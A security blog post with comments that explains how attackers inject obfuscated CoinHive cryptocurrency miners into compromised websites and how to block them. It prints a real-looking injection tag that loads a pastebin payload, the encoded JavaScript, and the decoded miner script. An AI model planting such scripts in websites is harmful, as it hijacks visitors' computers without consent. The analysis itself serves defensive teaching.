Unfortunately the combination of weak content management security combined with CoinHive have made it quite easy for attackers to embed cryptocurrency miners into webpages. Using obfuscated code, malware authors are able to insert javascript into pages that evade detection.

Browser users can use addons that blacklist access to coinhive javascript libraries and the many duplicates that are popping up, but much like antivirus, they merely block known versions.

Example Attack Code Remote Repository:

https://pastebin.com/raw/RNsgLpRs

Use: Embeded into webpages

<script type='text/javascript' src="https://pastebin.com/raw/RNsgLpRs"></script>

Payload:

(function (id){
var s = "=tdsjqu!tsd>#iuuqt;00dpjoijwf/dpn0mjc0dpjoijwf/njo/kt#?=0tdsjqu?
=tdsjqu?!wbs!njofs!>!ofx!DpjoIjwf/Bopoznpvt)((-!|!uispuumf;!1/3!
~*<njofs/tubsu)*<=0tdsjqu?";

var res = "";
var stringLength = s.length;
var flag = false;
for(var i = 0; i < stringLength; i++){
if(s.charCodeAt(i) == 40){
if(flag) continue;
res += "\'" + id;
flag = true;
}
res += String.fromCharCode(s.charCodeAt(i)-1);
}
document.write(res);
})
('i2y4BgTPHv3upoWyw0XCXZRn6RgWnKdw'); // I assume this is here for the attackers own reference...lol

1) var s = the main payload string

2) s.charCodeAt(i)-1 recodes s string to unicode string with values “shifted” by -1

  60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,99,111,105,
110,104,105,118,101,46,99,111,109,47,108,105,98,47,99,111,105,110,104,105,118,101,46,109,
105,110,46,106,115,34,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,32,
118,97,114,32,109,105,110,101,114,32,61,32,110,101,119,32,67,111,105,110,72,105,118,101,
46,65,110,111,110,121,109,111,117,115,40,39,39,44,32,123,32,116,104,114,111,116,116,108,
101,58,32,48,46,50,32,125,41,59,109,105,110,101,114,46,115,116,97,114,116,40,41,59,60,47,
115,99,114,105,112,116,62

3) fromCharCode() method converts unicode values into characters

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script> var miner = new CoinHive.Anonymous('i2y4BgTPHv3upoWyw0XCXZRn6RgWnKdw',
{ throttle: 0.2 });miner.start();</script>

For browser prevention

For Firefox: Nominer
For Chrome: No Coin

For Website Injection Prevention

To prevent any rogue code being injected into your website files, or unauthorised files being added to your Content Management System (CMS) files repository, keep your CMS website, themes and plugins up to date, choose themes and plugins carefully, use secure webhosting.

Some security addons like Pareto Security can capture attempts to append code into WordPress, but none of these are as effective as following the above advice.

  1. W D Thompson says:

    My poor WordPress site has finally been hacked, has all sorts of URL’s to a wide variety of spam sites. Any assistance will be appreciated.

  2. LN says:

    I actually prefer CoinHive crypto mining captcha over anti-tor google’s recaptcha.
    However the background mining is a bit too much, i like the idea thougu, things are evolving, and it’s the site owner problem letting people XSS it and activating the miner by clicking a button on cookie-like notice should be fair. remember that cookies were considered evil and technically they do use your computers resource and both can be abused by the implementer like everything else.
    It’s just my point of view, ads and miners both generate a very small amount that using visitors cpu power is useless that it becomes kinda bad but many devs choose to make things easier for themselves by passing the pain to users using electron so it isn’t a really new concept but the purpose is.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>